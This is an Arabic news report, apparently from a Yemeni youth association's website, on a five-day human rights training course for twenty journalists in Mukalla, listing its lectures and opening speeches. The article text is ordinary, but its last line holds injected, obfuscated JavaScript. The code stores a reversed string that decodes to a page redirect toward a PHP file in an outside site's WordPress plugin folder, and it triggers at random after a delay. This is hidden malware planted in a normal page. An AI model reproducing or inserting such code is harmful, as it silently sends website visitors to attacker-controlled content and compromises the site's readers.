عشرون كادراً صحفياً في دورة تدريبية بمجال حقوق الإنسان بالمكلا

الشباب الديمقراطي يوقع عقد مشروع التعبير الرقمي مع صندوق الشباب – الأمم المتحدة
16 أغسطس، 2014
الشباب الديمقراطي يختتم المرحلة الاولى حول التعبير الرقمي ولقاءات وانطباعات عن المشروع
16 أغسطس، 2014

عشرون كادراً صحفياً في دورة تدريبية بمجال حقوق الإنسان بالمكلا

المكلا – خاص: 

DSC03502

بدأت بالمكلا اليوم فعاليات الدورة التدريبية الخاصة بالإعلاميين الشباب للتوعية في مجال حقوق الإنسان. وينظم الدورة جمعيات الشباب الديمقراطي والشروق النسائية وحماية المريض بالتعاون مع مؤسسة تنمية القيادات الشابة وبمشاركة 20 صحفيا وإعلاميا من المؤسسات الإعلامية والصحفية الحكومية والأهلية. 
ويتلقى المشاركون خلال 5 أيام عدداً من المحاضرات في مجال مفهوم حقوق الإنسان والمفهوم العالمي لحقوق الإنسان في الإسلام ومبادئ وأسس حقوق الإنسان ودور الصحفيين في الإعلان العالمي لحقوق الإنسان والنهج الصحفي وحقوق الإنسان والطفل في اليمن . 
وفي الجلسة الإفتتاحية للدورة أكد وكيل المحافظة المساعد / علي عمر باهيصمي أهمية هذه الدورة للكوادر الصحفية والاعلامية للتعرف على الاتفاقيات والعهود الدولية الأساسية لحقوق الانسان واستيعاب اسس الممارسة الصحفية القائمة على المنهج الحقوقي في الصحافة واكتساب المهارات في التغطية المهنية لقضايا وحقوق الإنسان في المجتمع المحلي . 
كما ألقيت كلمات من قبل رئيس جمعية الشباب الديمقراطي ورئيس جمعية الشروق النسائية ومدير عام مؤسسة الاذاعة والتليفزيون فرع المكلا تطرقت جميعها الى الدور الاعلامي في التعريف بالمبادئ والقوانين الدولية لحقوق الانسان ومساهمة المرأة في النشاط الاعلامي في هذا المجال.) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and”]